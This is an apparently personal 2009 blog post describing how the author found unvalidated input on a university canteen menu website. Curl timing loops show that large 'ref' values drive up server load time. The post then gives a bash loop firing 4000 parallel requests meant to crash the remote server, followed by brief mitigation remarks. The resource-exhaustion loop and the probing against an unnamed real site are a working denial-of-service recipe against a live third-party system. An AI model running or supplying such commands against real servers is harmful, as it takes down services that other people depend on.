Thursday, October 22, 2009

Abuse the load time of a Web page, for DoS & profit

In my university, we have different canteens (this is how it's called) where you can eat for lunch. Each canteen puts its food on a common website.

You also have the possibility to see what was yesterday's lunch, but also tomorrow's one. Basically, if you request tomorrow's offer, the URL will look like
http://X?ref=1
If you want yesterday's URL, you will type
http://X?ref=-1
And obviously, if you want to have the menu that was available 2 days ago, you just have to type
http://X?ref=-2
Of course, the idea is to input a big number here and see what happens. Usually, big numbers are escaped. Let's have a try...
http://X?ref=-20000
This gives us the offers of the Wednesday, Jan 19 1955. Of course, the entry is empty, but it's fun to come back that much. Now we add one more '0'
http://X?ref=-200000
The date now is Jan 1st 1970. This date should talk to you (doesn't it ?). Do we have an overflow somewhere in there ? Clearly, there is a validation input issue. I also quickly tested other escape patterns, they did not work.

However, we can measure the load time of the page to see if our input modifies it. To do it, I will use this small script that will only count the load time

for i in $(seq 1 8000000 2000000000)
do
curl -s -w "%{time_total}\n" -o /dev/null http://X.php?ref=-$i >> /tmp/result.txt
done
Then, we can plot the result of the previous command.

I admit I wasn't expecting such an increase. The script probably has an internal loop and iterates over the argument we provide. If we decrease the granularity by increasing the increment, but also the limit, this rule is confirmed as you can see on the next plot.



This time, we start seeing some discrepancies, but the overall picture is still linear. Since we get such a nice graph, why not trying with HUGE values ?

curl -s -w "%{time_total}\n" -o /dev/null http://X?ref=-200000000000
30.084

The last request took 30s to be computed. So what's next ? If it takes 30 seconds for 1 request, what will happen for 4000 requests ?

for i in {1..4000}
do
curl -s -w "%{time_total}\n" -o /dev/null http://X?ref=-200000000000 > /dev/null &
done

You will notice that a '&' was added at the end of the command, in order it to fork. It will probably dramatically slow down your computer, but you will eventually crash the remote machine.

Actually, the load time trick has already been used in the past. Typically, you could use this to query a database: depending on the time it takes to answer, you'll be able to deduce whether the login/pass was in the database or not (sort of "side channel attack").

Well, once you can identify this kind of behavior (change in the processing time upon request), it becomes just a matter of requests for the machine to become out of ressources. Here, the server is misconfigured: one should not allow so many request from a client in such a small time, especially when they increase the resource consumption, and one should also check the input validation more carefully.

No comments:

Post a Comment